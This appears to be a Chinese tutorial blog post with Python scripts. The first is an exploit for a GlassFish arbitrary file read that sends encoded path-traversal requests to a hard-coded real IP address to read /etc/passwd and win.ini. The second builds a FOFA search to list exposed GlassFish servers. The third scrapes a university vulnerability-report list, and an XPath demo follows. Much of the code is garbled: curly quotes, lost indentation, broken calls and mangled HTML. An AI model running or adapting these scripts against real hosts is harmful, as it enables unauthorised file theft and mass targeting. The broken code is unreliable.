import requests
url=”http://217.27.153.138:4848/”
payload_linux = "/theme/METAINF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
payload_windows = "/theme/METAINF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini"
data_linux=requests.get(url+payload_linux) #获取请求后的返回源代码
data_windows=requests.get(url+payload_windows) #获取请求后的返回源代码
print(data_linux.content.decode(‘utf-8’))
print(data_windows.content.decode(‘utf-8’))
statuscode_linux = data_linux.status_code #获取请求后的返回状态码
statuscode_windows = data_windows .status_code #获取请求后的返回状态码
if statuscode_linux == 200:
print("glassfish任意文件读取漏洞存在")
print(data_linux.text)
elif statuscode_windows == 200:
print("glassfish任意文件读取漏洞存在")
print(data_windows.text)
else:
print("glassfish任意文件读取漏洞不存在")
Python 开发-Fofa 搜索结果提取采集脚本
import base64
import requests
url = "https://fofa.info/result?qbase64="
search_data ='"glassfish" && port="4848"'
search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8")
urls=url+search_data_b64
print(search_data_b64)
print(urls)
result=requests(urls.get)
print(result.content.decode('utf-8'))
结果:
https://src.sjtu.edu.cn/
import requests, time
from lxml import etree
url = 'https://src.sjtu.edu.cn/list/?'
data = requests.get(url).content
soup=etree.HTML(data)
result = soup.xpath('//td/a/text()')
result=set(result)#消除重复
results = '\n'.join(result)
resultss = results.split()
for edu in resultss:
with open(r'src.txt','a+',encoding='utf-8') as f:
f.write(edu + '\n')
结果:
提取的data中的一个模块:
<tr class="row">
<td class="am-text-center am-hide-sm-down">2022-05-09td>
<td>
<a href="/post/142243/">
上海交通大学存在敏感信息泄露
a>
td>
<td class="am-text-center am-hide-sm-down"><span class="am-badge am-badge-secondary">低危span>td>
<td class="am-text-center"><a href="/profile/12488/">
blame哥求求你带带弟弟a>td>
tr>
筛选出所有数据中的漏洞信息,如:上海交通大学存在敏感信息泄露。
用result = soup.xpath('//td/a/text()')
,但是结果就是所有td的子节点a的内容都显示出来了。
text.html
<div>
<ul>
<li class="item-0"><a href="link1.html">第一个a>li>
<li class="item-1"><a href="link2.html">second itema>li>
ul>
div>
test.py
from lxml import etree
text='''
- 第一个
- second item
'''
html=etree.HTML(text,etree.HTMLParser())
result=html.xpath('//li[@]/a/text()') #获取a节点下的内容
result1=html.xpath('//li[@]//text()') #获取li下所有子孙节点的内容
print(result)
print(result1)
结果:
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)